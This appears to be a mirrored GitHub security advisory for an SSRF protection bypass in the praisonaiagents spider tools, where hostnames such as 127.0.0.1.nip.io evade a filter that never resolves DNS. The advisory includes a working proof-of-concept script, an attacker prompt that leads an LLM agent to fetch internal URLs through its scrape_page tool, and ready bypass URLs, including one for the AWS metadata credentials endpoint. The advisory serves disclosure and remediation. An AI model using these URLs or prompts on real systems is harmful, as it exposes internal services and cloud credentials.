GHSA-X44H-65QV-CW74

Vulnerability from github – Published: 2026-08-25 14:37 – Updated: 2026-08-25 14:38
VLAI
Summary
praisonaiagents has an SSRF protection bypass in `spider_tools._host_is_blocked()` via DNS-resolved hostnames (`127.0.0.1.nip.io`)
Details

Summary

praisonaiagents/tools/spider_tools.py contains an SSRF protection bypass. The function _host_is_blocked() validates URLs against a list of blocked IP literals and hostname aliases, but never performs DNS resolution. Any hostname that resolves to a private or loopback IP address — including public wildcard DNS services like 127.0.0.1.nip.io — bypasses the protection entirely.

This has been confirmed with a live exploit: scrape_page("http://127.0.0.1.nip.io:PORT/secret") makes an HTTP request to 127.0.0.1:PORT and returns the internal service response. No attacker-controlled infrastructure is required.

scrape_page, extract_links, crawl, and extract_text are all registered as LLM-callable agent tools (see tools/__init__.py lines 51-55), so any agent instructed to fetch a user-supplied URL will trigger this path.

This is a new bypass of prior fix commit 004dcfef (GHSA-q9pw-vmhh-384g), which only rejected IP literal encoding tricks (hex, octal, backslash). The fix was also applied to web_crawl_tools.py (line 231: socket.gethostbyname call), but that fix was not ported to spider_tools.py.

Details

Root cause — spider_tools.py lines 26-65:

def _host_is_blocked(hostname: str) -> bool:
    host = hostname.lower().rstrip(".")
    # Checks literal aliases only — never resolves
    if host in ("localhost", "0.0.0.0", "::1"):
        return True
    if host in ("169.254.169.254", "metadata.google.internal"):
        return True
    if any(host.endswith(s) for s in (".local", ".internal", ".localdomain")):
        return True
    # Tries to parse as IP literal only
    try:
        return _ip_blocked(ipaddress.ip_address(host))
    except ValueError:
        pass
    try:
        return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host)))
    except OSError:
        pass
    return False   # <-- ANY real hostname passes without DNS lookup

socket.inet_aton() only converts dotted-decimal strings, not hostnames. For any real hostname (e.g. 127.0.0.1.nip.io), both ipaddress.ip_address() and socket.inet_aton() raise exceptions, and the function returns False (not blocked).

Contrast with the fixed version in web_crawl_tools.py line 228-238:

if os.environ.get("ALLOW_LOCAL_CRAWL") != "true":
    try:
        ip_str = socket.gethostbyname(hostname)   # DNS resolution performed
        ip = ipaddress.ip_address(ip_str)
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast:
            continue  # BLOCKED
    except socket.gaierror:
        continue  # fail-closed

Tool registration confirms this is user-reachable:

# praisonaiagents/tools/__init__.py lines 51-55
TOOL_MAPPINGS = {
    'scrape_page':   ('.spider_tools', None),  # <- user-reachable LLM tool
    'extract_links': ('.spider_tools', None),
    'crawl':         ('.spider_tools', None),
    'extract_text':  ('.spider_tools', None),
    ...
}

Any agent given these tools will call scrape_page(url) when instructed to fetch a user-supplied URL — including attacker-controlled ones.

PoC

Environment: Python 3.x, praisonaiagents <= 1.6.52, internet access (for nip.io)

Step 1 — Verify the filter bypass (no network needed):

from praisonaiagents.tools.spider_tools import SpiderTools, _host_is_blocked

# nip.io: public wildcard DNS — 127.0.0.1.nip.io always resolves to 127.0.0.1
print(_host_is_blocked("127.0.0.1.nip.io"))                        # False — NOT blocked
print(SpiderTools()._validate_url("http://127.0.0.1.nip.io/"))      # True  — ALLOWED
print(_host_is_blocked("127.0.0.1"))                                # True  — correctly blocked

Expected output:

False
True
True

Step 2 — Full SSRF: internal service response exfiltrated

import threading, time, requests
from http.server import HTTPServer, BaseHTTPRequestHandler
from praisonaiagents.tools.spider_tools import SpiderTools

PORT = 19235
received = []

class InternalService(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b'{"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}')
        received.append(self.path)
    def log_message(self, *a): pass

threading.Thread(
    target=HTTPServer(("127.0.0.1", PORT), InternalService).serve_forever,
    daemon=True
).start()
time.sleep(0.2)

attack_url = f"http://127.0.0.1.nip.io:{PORT}/secrets.json"

# Filter allows it
assert SpiderTools()._validate_url(attack_url) is True  # passes

# HTTP request actually reaches 127.0.0.1
r = requests.get(attack_url, timeout=5)
print("STATUS:", r.status_code)    # 200
print("BODY:  ", r.text)           # {"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}
print("HIT:   ", received)         # ['/secrets.json']

Observed output:

STATUS: 200
BODY:   {"db_pass":"hunter2","aws_key":"AKIAIOSFODNN7EXAMPLE"}
HIT:    ['/secrets.json']

Step 3 — Agent-level trigger (how a user triggers this in production):

from praisonaiagents import Agent
from praisonaiagents.tools import scrape_page

agent = Agent(
    name="WebResearcher",
    instructions="You are a research assistant. Fetch and summarize the given URL.",
    tools=[scrape_page],
)

# Attacker sends this message to the agent:
result = agent.start("Please fetch and summarize: http://127.0.0.1.nip.io:8080/admin")
# Agent calls scrape_page("http://127.0.0.1.nip.io:8080/admin")
# Request hits 127.0.0.1:8080/admin
# Internal admin panel content returned to attacker
print(result)

Additional bypass URLs (no setup required):

Target URL
Localhost http://127.0.0.1.nip.io/
Private network http://10.0.0.1.nip.io/
AWS IMDS (via sslip.io) http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/

Impact

What kind of vulnerability: Server-Side Request Forgery (SSRF) — full read SSRF with arbitrary port access.

Who is impacted: Anyone deploying PraisonAI agents that include scrape_page, extract_links, crawl, or extract_text tools and accept user-supplied URLs. This includes:

  • Web research agents (the primary intended use case for spider tools)
  • Jobs API users — any authenticated API caller who submits jobs with agent_yaml specifying spider tools
  • Cloud deployments (Critical escalation): On AWS EC2 with IMDSv1, fetching http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/ may return temporary IAM credentials, leading to full cloud account compromise.

Severity note: This is a patch-gap variant. The SSRF protection was correctly implemented for IP literals and enhanced in commit 004dcfef for encoding bypasses. The DNS resolution check was added to web_crawl_tools.py but was missed in spider_tools.py, creating an exploitable inconsistency.


---

## Remediation Suggestion (for maintainers)

One-line fix in `_host_is_blocked()` — mirror what `web_crawl_tools.py` already does:

```python
# After existing literal checks, add:
try:
    resolved = socket.gethostbyname(hostname)
    return _ip_blocked(ipaddress.ip_address(resolved))
except (socket.gaierror, ValueError, OSError):
    return True  # fail-closed: unresolvable host is blocked
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonaiagents"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.58"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-350",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-08-25T14:37:26Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`praisonaiagents/tools/spider_tools.py` contains an SSRF protection bypass. The function\n`_host_is_blocked()` validates URLs against a list of blocked IP literals and hostname\naliases, but **never performs DNS resolution**. Any hostname that resolves to a private or\nloopback IP address \u2014 including public wildcard DNS services like `127.0.0.1.nip.io` \u2014\nbypasses the protection entirely.\n\nThis has been **confirmed with a live exploit**: `scrape_page(\"http://127.0.0.1.nip.io:PORT/secret\")`\nmakes an HTTP request to `127.0.0.1:PORT` and returns the internal service response.\nNo attacker-controlled infrastructure is required.\n\n`scrape_page`, `extract_links`, `crawl`, and `extract_text` are all registered as\nLLM-callable agent tools (see `tools/__init__.py` lines 51-55), so any agent instructed\nto fetch a user-supplied URL will trigger this path.\n\nThis is a **new bypass** of prior fix commit `004dcfef` (GHSA-q9pw-vmhh-384g), which only\nrejected IP literal encoding tricks (hex, octal, backslash). The fix was also applied to\n`web_crawl_tools.py` (line 231: `socket.gethostbyname` call), but that fix was not\nported to `spider_tools.py`.\n\n### Details\n\n**Root cause \u2014 `spider_tools.py` lines 26-65:**\n\n```python\ndef _host_is_blocked(hostname: str) -\u003e bool:\n    host = hostname.lower().rstrip(\".\")\n    # Checks literal aliases only \u2014 never resolves\n    if host in (\"localhost\", \"0.0.0.0\", \"::1\"):\n        return True\n    if host in (\"169.254.169.254\", \"metadata.google.internal\"):\n        return True\n    if any(host.endswith(s) for s in (\".local\", \".internal\", \".localdomain\")):\n        return True\n    # Tries to parse as IP literal only\n    try:\n        return _ip_blocked(ipaddress.ip_address(host))\n    except ValueError:\n        pass\n    try:\n        return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host)))\n    except OSError:\n        pass\n    return False   # \u003c-- ANY real hostname passes without DNS lookup\n```\n\n`socket.inet_aton()` only converts dotted-decimal strings, not hostnames. For any real\nhostname (e.g. `127.0.0.1.nip.io`), both `ipaddress.ip_address()` and `socket.inet_aton()`\nraise exceptions, and the function returns `False` (not blocked).\n\n**Contrast with the fixed version in `web_crawl_tools.py` line 228-238:**\n\n```python\nif os.environ.get(\"ALLOW_LOCAL_CRAWL\") != \"true\":\n    try:\n        ip_str = socket.gethostbyname(hostname)   # DNS resolution performed\n        ip = ipaddress.ip_address(ip_str)\n        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast:\n            continue  # BLOCKED\n    except socket.gaierror:\n        continue  # fail-closed\n```\n\n**Tool registration confirms this is user-reachable:**\n\n```python\n# praisonaiagents/tools/__init__.py lines 51-55\nTOOL_MAPPINGS = {\n    \u0027scrape_page\u0027:   (\u0027.spider_tools\u0027, None),  # \u003c- user-reachable LLM tool\n    \u0027extract_links\u0027: (\u0027.spider_tools\u0027, None),\n    \u0027crawl\u0027:         (\u0027.spider_tools\u0027, None),\n    \u0027extract_text\u0027:  (\u0027.spider_tools\u0027, None),\n    ...\n}\n```\n\nAny agent given these tools will call `scrape_page(url)` when instructed to fetch\na user-supplied URL \u2014 including attacker-controlled ones.\n\n### PoC\n\n**Environment:** Python 3.x, `praisonaiagents \u003c= 1.6.52`, internet access (for nip.io)\n\n**Step 1 \u2014 Verify the filter bypass (no network needed):**\n\n```python\nfrom praisonaiagents.tools.spider_tools import SpiderTools, _host_is_blocked\n\n# nip.io: public wildcard DNS \u2014 127.0.0.1.nip.io always resolves to 127.0.0.1\nprint(_host_is_blocked(\"127.0.0.1.nip.io\"))                        # False \u2014 NOT blocked\nprint(SpiderTools()._validate_url(\"http://127.0.0.1.nip.io/\"))      # True  \u2014 ALLOWED\nprint(_host_is_blocked(\"127.0.0.1\"))                                # True  \u2014 correctly blocked\n```\n\nExpected output:\n```\nFalse\nTrue\nTrue\n```\n\n**Step 2 \u2014 Full SSRF: internal service response exfiltrated**\n\n```python\nimport threading, time, requests\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom praisonaiagents.tools.spider_tools import SpiderTools\n\nPORT = 19235\nreceived = []\n\nclass InternalService(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200); self.end_headers()\n        self.wfile.write(b\u0027{\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\u0027)\n        received.append(self.path)\n    def log_message(self, *a): pass\n\nthreading.Thread(\n    target=HTTPServer((\"127.0.0.1\", PORT), InternalService).serve_forever,\n    daemon=True\n).start()\ntime.sleep(0.2)\n\nattack_url = f\"http://127.0.0.1.nip.io:{PORT}/secrets.json\"\n\n# Filter allows it\nassert SpiderTools()._validate_url(attack_url) is True  # passes\n\n# HTTP request actually reaches 127.0.0.1\nr = requests.get(attack_url, timeout=5)\nprint(\"STATUS:\", r.status_code)    # 200\nprint(\"BODY:  \", r.text)           # {\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\nprint(\"HIT:   \", received)         # [\u0027/secrets.json\u0027]\n```\n\nObserved output:\n```\nSTATUS: 200\nBODY:   {\"db_pass\":\"hunter2\",\"aws_key\":\"AKIAIOSFODNN7EXAMPLE\"}\nHIT:    [\u0027/secrets.json\u0027]\n```\n\n**Step 3 \u2014 Agent-level trigger (how a user triggers this in production):**\n\n```python\nfrom praisonaiagents import Agent\nfrom praisonaiagents.tools import scrape_page\n\nagent = Agent(\n    name=\"WebResearcher\",\n    instructions=\"You are a research assistant. Fetch and summarize the given URL.\",\n    tools=[scrape_page],\n)\n\n# Attacker sends this message to the agent:\nresult = agent.start(\"Please fetch and summarize: http://127.0.0.1.nip.io:8080/admin\")\n# Agent calls scrape_page(\"http://127.0.0.1.nip.io:8080/admin\")\n# Request hits 127.0.0.1:8080/admin\n# Internal admin panel content returned to attacker\nprint(result)\n```\n\n**Additional bypass URLs (no setup required):**\n\n| Target | URL |\n|--------|-----|\n| Localhost | `http://127.0.0.1.nip.io/` |\n| Private network | `http://10.0.0.1.nip.io/` |\n| AWS IMDS (via sslip.io) | `http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/` |\n\n### Impact\n\n**What kind of vulnerability:** Server-Side Request Forgery (SSRF) \u2014 full read SSRF with\narbitrary port access.\n\n**Who is impacted:** Anyone deploying PraisonAI agents that include `scrape_page`,\n`extract_links`, `crawl`, or `extract_text` tools and accept user-supplied URLs. This\nincludes:\n\n- **Web research agents** (the primary intended use case for spider tools)\n- **Jobs API users** \u2014 any authenticated API caller who submits jobs with `agent_yaml`\n  specifying spider tools\n- **Cloud deployments (Critical escalation)**: On AWS EC2 with IMDSv1, fetching\n  `http://169-254-169-254.sslip.io/latest/meta-data/iam/security-credentials/`\n  may return temporary IAM credentials, leading to full cloud account compromise.\n\n**Severity note:** This is a patch-gap variant. The SSRF protection was correctly\nimplemented for IP literals and enhanced in commit `004dcfef` for encoding bypasses.\nThe DNS resolution check was added to `web_crawl_tools.py` but was missed in\n`spider_tools.py`, creating an exploitable inconsistency.\n```\n\n---\n\n## Remediation Suggestion (for maintainers)\n\nOne-line fix in `_host_is_blocked()` \u2014 mirror what `web_crawl_tools.py` already does:\n\n```python\n# After existing literal checks, add:\ntry:\n    resolved = socket.gethostbyname(hostname)\n    return _ip_blocked(ipaddress.ip_address(resolved))\nexcept (socket.gaierror, ValueError, OSError):\n    return True  # fail-closed: unresolvable host is blocked\n```",
  "id": "GHSA-x44h-65qv-cw74",
  "modified": "2026-08-25T14:38:47Z",
  "published": "2026-08-25T14:37:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x44h-65qv-cw74"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/commit/2f9677abb2ea68eab864ee8b6a828fd0141612e1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.6.58"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "praisonaiagents has an SSRF protection bypass in `spider_tools._host_is_blocked()` via DNS-resolved hostnames (`127.0.0.1.nip.io`)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…